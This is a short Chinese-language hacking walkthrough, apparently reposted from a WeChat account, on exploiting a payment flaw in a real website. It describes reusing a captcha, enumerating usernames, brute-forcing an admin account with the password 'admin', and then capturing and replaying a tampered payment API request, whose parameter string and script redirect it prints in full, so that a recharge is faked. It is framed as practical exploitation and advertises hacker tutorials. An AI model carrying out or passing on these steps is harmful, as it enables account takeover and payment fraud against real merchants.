扫码领资料
获黑客教程
免费&进群
学习更多漏洞挖掘技巧
欢迎扫码领取配套视频教程
新手实战刷课网站、好玩又有趣!
第一步
打开网站、任意账户名密码登陆发现验证码可重复利用
这时候我们可以试试admin账号、发现如果账号正确会提示账户已存在、反之回显账户密码错误
第二步
既然验证码可以重复利用;而且账号名有回显
这时候我们试试爆破用户名密码发现有很多有户
以admin为用户名这时候爆破一下、密码发现密码为admin
登陆成功
第三步寻找功能点发现充值页面
抓包点击看回显
发现回显的值为字典对其分析
第四步对其回显分析
<script>window.location.href = 'http:// 自己的服务器 /payapi.php?paytype=createOrder&userid=1026&payId=1618553155305¶m=2003-1921-cz&type=1&price=10sign=018521dd63a59c8b1f4d750426b1f209¬ifyUrl=http:// 目标网站/gedianpay/notify001.php&returnUrl=http:// 目标网站/gedianpay/return.php&isHtml=1</script>
提取里面的网址对其传参问号后的语句
?paytype=createOrder&userid=1026&payId=1618553155305¶m=2003-1921-cz&type=1&price=10sign=018521dd63a59c8b1f4d750426b1f209¬ifyUrl=http:// 目标网站/gedianpay/notify001.php&returnUrl=http:// 目标网站/gedianpay/return.php&isHtml=1
第五步依次打开传参文件对其传入
依次传入paytype=createOrder&userid=1026&payId=1618553155305¶m=2003-1921-cz&type=1&price=10sign=018521dd63a59c8b1f4d750426b1f209¬ifyUrl=http:// 目标网站/gedianpay/notify001.php&returnUrl=http:// 目标网站/gedianpay/return.php&isHtml=1
(这里充值10元)
看回显并刷新页面参数(注意现在是直接对文件进行传参改变里面的金额)
查看页面变化
最后查看返回值是否为10元成功充值
欢迎加我微信:zkaq99、实时分享安全动态
2021-02-07
2021-01-26
2021-01-25
2021-01-07
2020-12-22
2020-12-20
原文始发于微信公众号(白帽子左一):实战 | 一个很奇怪的支付漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论